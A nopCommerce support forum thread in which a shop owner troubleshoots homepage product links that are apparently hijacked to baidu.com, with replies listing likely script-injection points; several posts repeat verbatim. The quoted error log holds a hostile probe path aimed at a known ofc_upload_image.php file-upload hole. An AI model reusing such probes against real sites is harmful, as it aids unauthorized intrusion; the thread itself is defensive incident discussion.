Hallow nop community,
I choose to post here (General Support) thinking I might not be the only one having this problem. So I kindly ask the forum admins/moderators to re-post it in the more appropriate forum, if it’s not in the right one.
I do not suggest the problem described is related to any nopCommerce bug, but if it is in anyway related to some kind of security issue not properly treated in code, I'm sure it might me helpfull to investigate
A few months ago I published a nop 3.00 website for selling print supplies. It's accessible at http://www.printsupplies.sbshop.ro
It worked wonderful until a few days ago, when I found some changes I was unaware about.
I am writing this to any of you hoping someone could help me with any kind of suggestions about what should I do to restore the site to its nice functional state.
The environment
My website is hosted on a machine in my company. I set it up myself everything: OS, SQL Server, WebSite (nop installation) and any customization necessary.
I have stopped the WM-Remote management service, disabled any remote access to this machine I could think of (except for Website access of course) and generally adopted many of the Windows and SQL Server recommended security policies.
For any operation I need to do on this machine I log on locally and log off immediately after I'm done working.
The problem
I have on my home page 9 featured products. Normally, each of these products displays its picture in the FEATURED PRODUCTS section on the home page.
Each of these pictures has a link to their product page, and a link to their picture URL.
For example, my first featured product picture URL should be http://www.printsupplies.sbshop.ro/content/images/thumbs/0006440_bs0625b001aa_125.jpeg and clicking on it should open the page at http://www.printsupplies.sbshop.ro/en/bs0625b001aa, which is its corresponding product page.
The symptom:
From time to time I found that the featured product picture is missing and clicking on any of the empty picture frames of the featured product on the home page, opens an unwanted webpage with an URL starting with http://www.baidu.com/... which mimics the Google search page in some Asian language (probably Chinese).
I was very surprised to see that for all my featured products the picture URL was somehow being changed to that of the URL of the unwanted odd Chinese page.
Also I found that from time to time the normal behavior of the site seem to revert to normal without my intervention, which was quite dazzling, until I started to suspect some ”guest” customer accounts for the whole problem. It seems that guest accounts gets deleted automatically at every 600 seconds...
Measures I took
1. First I searched all the website files for anyone containing ”baidu.com” (domain part of the ”fake” injected URL). No such file was found.
2. I searched many of the DB tables with the same query mask and found a few records in the GenericAttribute table. All these records seems to be ”Last visited page” URLs of some guest accounts.
3. I deleted (from the Administrative web site) all guest customers. Result was that the problem seemed to disappear by miracle. Later I found that the problem re-appeared and is manifesting exactly the same.
4. I restored all website files from a backup that I took long before this problem manifested itself. Problem was excluded, but re-appeared the next day.
5. I ”digg” a lot of nop source code, and unfortunately found no understanding of how did this ”bug” entered my system. In nop, these URLs are extracted in code from database (where I didn't found any sign of the injected ”fake” URL). It's like somehow some method calls gets ”redirected” to a different implementation containing some malign code. This code should be in an foreign DLL, but I didn't fount any such file (yet ?).
6. There is no more an ”IP ban” support for nop 3.0. I would have tried to simply ban all the IP's of the ”baidu.com” domain. I tried to find a plugin that could provide this ”IP ban” function, but found none yet.
7. Finally I found the error message (see below) that I think might be related to the described problem, but I am not sure about that. I find the originated page URL (described in the error message) intriging.
Log level:
Error
The log entry message.Short message:
A potentially dangerous Request.Path value was detected from the client (&).
The details for the log entry.Full message:
System.Web.HttpException (0x80004005): A potentially dangerous Request.Path value was detected from the client (&). at System.Web.HttpRequest.ValidateInputIfRequiredByConfig() at System.Web.HttpApplication.PipelineStepManager.ValidateHelper(HttpContext context)
IP address of the machine that caused the exception.IP address:
148.243.214.3
Name of the customer who caused the exception.Customer:
builtin@search_engine_record.com
Originating page of exception.Page URL:
http://printsupplies.sbshop.ro/t/infopayment&sa=u&ei=64fauonho6mj4aslv4fq&ved=0ckmcebywutisag&usg=afqjcnfh8jh6vkoc-rrmkdkao3xkr6fruq/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=load.php
The referrer URL.Referrer URL:
Date/Time the log entry was created.Created on:
9/23/2013 10:26:06 PM
I am very grateful to anyone that might help solve this problem.
Regards,
Sorin Solescu
Fake URL injection in homepage - nop 3.00 site.
Team Member
- 16611
- 155810
- 10/22/2008
- Armenia
ssolescu wrote:
Product URL itself cannot be modified to redirect to a third-party site. Hence I think that the only way to archive it is injecting some java-script which will open a new URL instead of the default one. It could be done one of the following ways:
1. Modify cshtml files
2. Inject it into topic (HomePageText)
3. If you're using the default nivo slider plugin, then one of the slides (HTML of it) could contain java-script
4. Replace one of .js files on your server with a custom one
So the next time it happens immediately make a database and website backup. Then check all of this points. Also save the home page (HTML, related files) to file system. It could shred some light. Now...let's wait when it happens again.
P.S. I'm not an administrator. But I'm sure that there should be some tools which log ALL requests to a server. If you can make some debugging then (if you had some logs)
The problem
I have on my home page 9 featured products. Normally, each of these products displays its picture in the FEATURED PRODUCTS section on the home page.
Each of these pictures has a link to their product page, and a link to their picture URL.
For example, my first featured product picture URL should be http://www.printsupplies.sbshop.ro/content/images/thumbs/0006440_bs0625b001aa_125.jpeg and clicking on it should open the page at http://www.printsupplies.sbshop.ro/en/bs0625b001aa, which is its corresponding product page.
I have on my home page 9 featured products. Normally, each of these products displays its picture in the FEATURED PRODUCTS section on the home page.
Each of these pictures has a link to their product page, and a link to their picture URL.
For example, my first featured product picture URL should be http://www.printsupplies.sbshop.ro/content/images/thumbs/0006440_bs0625b001aa_125.jpeg and clicking on it should open the page at http://www.printsupplies.sbshop.ro/en/bs0625b001aa, which is its corresponding product page.
Product URL itself cannot be modified to redirect to a third-party site. Hence I think that the only way to archive it is injecting some java-script which will open a new URL instead of the default one. It could be done one of the following ways:
1. Modify cshtml files
2. Inject it into topic (HomePageText)
3. If you're using the default nivo slider plugin, then one of the slides (HTML of it) could contain java-script
4. Replace one of .js files on your server with a custom one
So the next time it happens immediately make a database and website backup. Then check all of this points. Also save the home page (HTML, related files) to file system. It could shred some light. Now...let's wait when it happens again.
P.S. I'm not an administrator. But I'm sure that there should be some tools which log ALL requests to a server. If you can make some debugging then (if you had some logs)
- 52
- 848
- 10/18/2010
- Romania
Thank you Andrei for your quick and usefull reply.
Indeed, it might be caused by altering some Java files.
I don't use the default NivoSlider. I replaced it with NivoSliderReloaded (downloaded from nop site).
The track to follow that you suggested is for sure a very good idea, and I thank you for it. I will definetely take a full snapshot of all related files when this problem will bug again and browse file-by-file to found the altered one, if any.
For now I just don't understand how could one inject such a file into my machine. I was prety confident about its safety.
I will post here any relevant findings following your advice. If positive, it might help others too.
Regards,
Sorin Solescu
Indeed, it might be caused by altering some Java files.
I don't use the default NivoSlider. I replaced it with NivoSliderReloaded (downloaded from nop site).
The track to follow that you suggested is for sure a very good idea, and I thank you for it. I will definetely take a full snapshot of all related files when this problem will bug again and browse file-by-file to found the altered one, if any.
For now I just don't understand how could one inject such a file into my machine. I was prety confident about its safety.
I will post here any relevant findings following your advice. If positive, it might help others too.
Regards,
Sorin Solescu
- 52
- 848
- 10/18/2010
- Romania
Here is a short description of the steps I took trying to solve this problem.
1. I stopped (disabled) all the scheduled tasks (from Administration -> System -> Schedule tasks, so that the Guest accounts don’t get deleted every 10 minutes.
Then I made a DB backup and I copied all the website files/folders to a reserved destination for analysis.
2. I used WinMerge ( thank you Andrei for the suggestion ! ) to find differences between the files/folders of the website (from the reserved location) and the content of the website files/folder as backed up some time ago, when the issue was not manifested.
All the files and folder were found to have identical content, except for some JPG files that are missing from Content/Thumbs folder in the backup. I think this is irrelevant. It might be that I uploaded/imported some pictures after I took the backup.
3. I looked into HomePageText topic in my database (tables Topic and LocalizedProperties).
I found no suspicious content here. It’s just a text that I put there.
4. After restarting the server machine, the injected URL links disappeared and the correct one were in their places. Initially I presume that there is some kind of malign code attached to a Gust account and when that account went deleted by the scheduled task the code went inactive. This was when trying to explain why the problem appeared and disappeared from time to time. I seems I was wrong. Now the task scheduler doesn’t run any task and still the issue disappeared after the machine restart.
I don’t know what to do next so with a lot of shame I started to contemplate the perspective of doing the most stupid think of all : a full re-installation of the server, starting from the OS setup… this time closing all the TCP/IP unneeded ports.
Or maybe someone might have a better idea. I’d be very grateful !
These are the moments I regret not being a hairdresser instead…
Regards,
Sorin Solescu
1. I stopped (disabled) all the scheduled tasks (from Administration -> System -> Schedule tasks, so that the Guest accounts don’t get deleted every 10 minutes.
Then I made a DB backup and I copied all the website files/folders to a reserved destination for analysis.
2. I used WinMerge ( thank you Andrei for the suggestion ! ) to find differences between the files/folders of the website (from the reserved location) and the content of the website files/folder as backed up some time ago, when the issue was not manifested.
All the files and folder were found to have identical content, except for some JPG files that are missing from Content/Thumbs folder in the backup. I think this is irrelevant. It might be that I uploaded/imported some pictures after I took the backup.
3. I looked into HomePageText topic in my database (tables Topic and LocalizedProperties).
I found no suspicious content here. It’s just a text that I put there.
4. After restarting the server machine, the injected URL links disappeared and the correct one were in their places. Initially I presume that there is some kind of malign code attached to a Gust account and when that account went deleted by the scheduled task the code went inactive. This was when trying to explain why the problem appeared and disappeared from time to time. I seems I was wrong. Now the task scheduler doesn’t run any task and still the issue disappeared after the machine restart.
I don’t know what to do next so with a lot of shame I started to contemplate the perspective of doing the most stupid think of all : a full re-installation of the server, starting from the OS setup… this time closing all the TCP/IP unneeded ports.
Or maybe someone might have a better idea. I’d be very grateful !
These are the moments I regret not being a hairdresser instead…
Regards,
Sorin Solescu
- 52
- 848
- 10/18/2010
- Romania
Hi Nick,
The problem is for sure not related to clients. I have obtained the same results while browsing from different machines, on different networks, even using different ISP routes and using different browsers (IE, Chrome, etc.). In my opinion clients are excluded.
One can not be absolutely sure that a server is 100% clean.
The machine serving this app has Win 2008 Web Server as OS, updated to the day.
It has an SQL 2008 R2 instance installed and the IIS has only one website – the nop 3.00 app.
I have closed a.s.a.p. (in Win Firewall) all remote access ports and disabled all remote access related services. I have even disabled IPv6… No other app was installed on this machine. Even the NET 4.5 framework (and many other required packages) were downloaded on a separate machine, scanned and then transferred to this machine to be deployed. I have never done any browsing from this machine. In short – I have tried my best to keep it save (I mean secured).
It is true that I didn’t deploy any fancy and expensive security apps (like Endpoint Security or similar), considering that the described measures are enough. Typical antivirus apps won’t run on Win Server OS.
On the server nothing else is going wrong. I have no problems recorded in Windows Logs (app log, system log, security log). There were some attempt to login from Internet on the machine, but the Guest user account is disabled and I have renamed the default Administrator account through Local Policy. I doubt a user login was successfully made from Internet into this machine.
I tend to suspect some kind of Java Script injected somewhere into my machine. I spent the last 10 hours trying to find something of this kind. Nothing until now.
What’s most annoying is the fact that all app files are clean (have identical content with the original ones), I have no suspect apps installed and I still don’t have found the ”bug”.
Do you have any suggestion on what to do ?
Regards,
Sorin Solescu
The problem is for sure not related to clients. I have obtained the same results while browsing from different machines, on different networks, even using different ISP routes and using different browsers (IE, Chrome, etc.). In my opinion clients are excluded.
One can not be absolutely sure that a server is 100% clean.
The machine serving this app has Win 2008 Web Server as OS, updated to the day.
It has an SQL 2008 R2 instance installed and the IIS has only one website – the nop 3.00 app.
I have closed a.s.a.p. (in Win Firewall) all remote access ports and disabled all remote access related services. I have even disabled IPv6… No other app was installed on this machine. Even the NET 4.5 framework (and many other required packages) were downloaded on a separate machine, scanned and then transferred to this machine to be deployed. I have never done any browsing from this machine. In short – I have tried my best to keep it save (I mean secured).
It is true that I didn’t deploy any fancy and expensive security apps (like Endpoint Security or similar), considering that the described measures are enough. Typical antivirus apps won’t run on Win Server OS.
On the server nothing else is going wrong. I have no problems recorded in Windows Logs (app log, system log, security log). There were some attempt to login from Internet on the machine, but the Guest user account is disabled and I have renamed the default Administrator account through Local Policy. I doubt a user login was successfully made from Internet into this machine.
I tend to suspect some kind of Java Script injected somewhere into my machine. I spent the last 10 hours trying to find something of this kind. Nothing until now.
What’s most annoying is the fact that all app files are clean (have identical content with the original ones), I have no suspect apps installed and I still don’t have found the ”bug”.
Do you have any suggestion on what to do ?
Regards,
Sorin Solescu
